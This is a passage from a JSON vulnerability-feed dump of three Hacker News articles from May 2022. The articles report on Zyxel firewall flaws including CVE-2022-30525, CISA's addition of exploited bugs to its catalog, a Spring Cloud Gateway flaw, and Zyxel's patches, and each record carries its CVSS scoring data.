"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhIGKFPN0camWO34C8CoXpDcrZclcT7c6-ypv1tJcY-mfhQARONnbO0PaDlZboql9V42YAGaZgoPskGrVz5tPzQqvfdgYybZ-X2zOlmjtLVkz9OH5WANIuEnYBVQc30Kolkv9Rtc75D-jj23bTt3pHK7G32wtGGb5Nb8OWMmKPNyPHPG4WsAjmBdYDm/s728-e100/firewall.jpg>) \n--- \nImage source: [z3r00t](<https://twitter.com/z3r00t/status/1524952406139748359>) \n \nThe U.S. Cybersecurity and Infrastructure Security Agency on Monday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/16/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing evidence of active exploitation.\n\nTracked as [CVE-2022-30525](<https://thehackernews.com/2022/05/zyxel-releases-patch-for-critical.html>), the vulnerability is rated 9.8 for severity and relates to a command injection flaw in select versions of the Zyxel firewall that could enable an unauthenticated adversary to execute arbitrary commands on the underlying operating system.\n\nImpacted devices include -\n\n * USG FLEX 100, 100W, 200, 500, 700\n * USG20-VPN, USG20W-VPN\n * ATP 100, 200, 500, 700, 800, and\n * VPN series\n\nThe issue, for which patches were released by the Taiwanese firm in late April (ZLD V5.30), became public knowledge on May 12 following a coordinated disclosure process with Rapid7.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj1WgS1ZJQACshVW-DJuxbFN1iHDnt93hQWGDuUdrvFT4dN9O8VSRWqAhjBgBDvYEOeuWDABBmMFdDdZjPtw8HVPmDj4N9WfJc1aC7gLju41YxO0oHtqBseAEBBTmgg29o4K2uVe5SNz5zIxmHk_wjNbUHTIlA8zl4nN8jjTHbQqSwId4h-uhDHrVx5/s728-e100/france.jpg>) \n--- \nSource: [Shadowserver](<https://twitter.com/Shadowserver/status/1525771529941921792>) \n \n \nMerely a day later, the Shadowserver Foundation [said](<https://twitter.com/Shadowserver/status/1525561213115158529>) it began detecting exploitation attempts, with most of the vulnerable appliances located in France, Italy, the U.S., Switzerland, and Russia.\n\nAlso added by CISA to the catalog is [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>), another code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a remote host by means of a specially crafted request.\n\nThe vulnerability is rated 10 out of 10 on the CVSS vulnerability scoring system and has since been [addressed](<https://tanzu.vmware.com/security/cve-2022-22947>) in Spring Cloud Gateway versions 3.1.1 or later and 3.0.7 or later as of March 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-17T03:17:00", "type": "thn", "title": "Watch Out! Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22947", "CVE-2022-30525"], "modified": "2022-05-17T03:24:22", "id": "THN:EC08545A59E5E648DC06498AB3111060", "href": "https://thehackernews.com/2022/05/watch-out-hackers-begin-exploiting.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T08:22:49", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEggD1ZoPa8g3otDemX3Emk-hnZ1JUOT6k08_JU-qPKPgA5ozuhHPAH2ilfZXmp0XUB-dtrp3IwoPi29AlbEMd1ThBI2wl-xbDfY6r5tge_B87u9TFH-pXATZ0vgtM1xjuDnKB4bdaeYEnpfIq_qPap3wKQQiKNDK9OW6KiL7W3SgSCLiTCEZ-a_Pm8c/s728-e100/zyxel-firewall-vpn-hacking.jpg>)\n\nZyxel has moved to address a critical security vulnerability affecting Zyxel firewall devices that enables unauthenticated and remote attackers to gain arbitrary code execution.\n\n\"A command injection vulnerability in the CGI program of some firewall versions could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device,\" the company [said](<https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml>) in an advisory published Thursday.\n\nCybersecurity firm Rapid7, which [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) and reported the flaw on April 13, 2022, said that the weakness could permit a remote unauthenticated adversary to execute code as the \"nobody\" user on impacted appliances.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiBWDvHIM8VlYCmW0afGuPJAqaW9vEmnvaSGxjUSZB6g0K6GhfdBRK0xbBPWZGJg-_9NsmzSVLMysuK9h4SB0Pw43uU1Eedee4tCAsbEospDqIw3wfBUtck7A0HaWlHFqL0PbLBqLNghemBpxmIMZJrnE54PlluxL9kNRQ8-JjUYZfGqV4fvaRNDOpu/s728-e100/exploit.jpg>)\n\nTracked as [CVE-2022-30525](<https://nvd.nist.gov/vuln/detail/CVE-2022-30525>) (CVSS score: 9.8), the flaw impacts the following products, with patches released in version ZLD V5.30 -\n\n * USG FLEX 100(W), 200, 500, 700\n * USG FLEX 50(W) / USG20(W)-VPN\n * ATP series, and \n * VPN series\n\nRapid 7 noted that there are at least 16,213 vulnerable Zyxel devices exposed to the internet, making it a lucrative attack vector for threat actors to stage potential exploitation attempts.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiTUn6SFUHRlZ21X6uMj5JWiTMDFhM7KG5i5VYt57h-UmHw6VMs3oKjWQaR-PE20-_1XSJCyLOTFGz1ISPv4XPJxwnX7OfL6ebQxdP1KkjU1l3dKhNtSNL2kJ2i-ZO1K68csWm9G4t5sO50redafSpTiTJn0v25cDNyKyhWyjUpZ4kP78tbhiFenBpg/s728-e100/shodan.jpg>)\n\nThe cybersecurity firm also pointed out that Zyxel silently issued fixes to address the issue on April 28, 2022 without publishing an associated Common Vulnerabilities and Exposures ([CVE](<https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures>)) identifier or a security advisory. Zyxel, in its alert, blamed this on a \"miscommunication during the disclosure coordination process.\"\n\n\"Silent vulnerability patching tends to only help active attackers, and leaves defenders in the dark about the true risk of newly discovered issues,\" Rapid7 researcher Jake Baines said.\n\nThe advisory comes as Zyxel addressed three different issues, including a command injection ([CVE-2022-26413](<https://www.zyxel.com/support/OS-command-injection-and-buffer-overflow-vulnerabilities-of-CPE-and-ONTs.shtml>)), a buffer overflow ([CVE-2022-26414](<https://www.zyxel.com/support/OS-command-injection-and-buffer-overflow-vulnerabilities-of-CPE-and-ONTs.shtml>)), and a local privilege escalation ([CVE-2022-0556](<https://www.zyxel.com/support/Zyxel-security-advisory-for-local-privilege-escalation-vulnerability-of-AP-Configurator.shtml>)) flaw, in its VMG3312-T20A wireless router and AP Configurator that could lead to arbitrary code execution.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T06:24:00", "type": "thn", "title": "Zyxel Releases Patch for Critical Firewall OS Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.7, "vectorString": "AV:A/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0556", "CVE-2022-26413", "CVE-2022-26414", "CVE-2022-30525"], "modified": "2022-05-13T08:16:16", "id": "THN:AC85E4A3174CEB4AD2B4BD1732D3B33C", "href": "https://thehackernews.com/2022/05/zyxel-releases-patch-for-critical.html", "cvss": {"score": 7.7, "vector": "AV:A/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T13:57:13", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg3QX4n7urMiSZ3CPl3Q8ObGIVpejuIlXcIJPqXQMpRyh41lpIuH3UeNPhACL6d0VLO5o8FDHCq3a4UYhL43umF9ml6USckfW0QkWZQcRhhxJJ8YdXPlVYYnFUZe3RP9GxGRabs_aUzbpka4pApiOjOrhOkjfF3fkw8Rt0Q11Rq_aAD-YWORvciN1Xr/s728-e100/zz.jpg>)\n\nZyxel has released [patches](<https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml>) to address four security flaws affecting its firewall, AP Controller, and AP products to execute arbitrary operating system commands and steal select information.\n\nThe list of security vulnerabilities is as follows -\n\n * **CVE-2022-0734** \\- A cross-site scripting (XSS) vulnerability in some firewall versions that could be exploited to access information stored in the user's browser, such as cookies or session tokens, via a malicious script.\n * **CVE-2022-26531** \\- Several input validation flaws in command line interface (CLI) commands for some versions of firewall, AP controller, and AP devices that could be exploited to cause a system crash.\n * **CVE-2022-26532** \\- A command injection vulnerability in the \"[packet-trace](<https://kb.zyxel.com/KB/searchArticle!gwsViewDetail.action?articleOid=013652&lang=EN>)\" CLI command for some versions of firewall, AP controller, and AP devices that could lead to execution of arbitrary OS commands.\n * **CVE-2022-0910** \\- An authentication bypass vulnerability affecting select firewall versions that could permit an attacker to downgrade from two-factor authentication to one-factor authentication via an IPsec VPN client.\n\nWhile Zyxel has published software patches for firewalls and AP devices, hotfix for AP controllers affected by CVE-2022-26531 and CVE-2022-26532 can be obtained only by contacting the respective local Zyxel support teams.\n\nThe development comes as a critical command injection flaw in select versions of Zyxel firewalls ([CVE-2022-30525](<https://thehackernews.com/2022/05/watch-out-hackers-begin-exploiting.html>), CVSS score: 9.8) has come under active exploitation, prompting the U.S. Cybersecurity and Infrastructure Security Agency to add the bug to its Known Exploited Vulnerabilities Catalog.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-27T07:28:00", "type": "thn", "title": "Zyxel Issues Patches for 4 New Flaws Affecting AP, API Controller, and Firewall Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0734", "CVE-2022-0910", "CVE-2022-26531", "CVE-2022-26532", "CVE-2022-30525"], "modified": "2022-05-27T10:10:02", "id": "THN:B287A447211203E6B749DBF0B90AF6C3", "href": "https://thehackernews.com/2022/05/zyxel-issues-patches-for-4-new-flaws.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}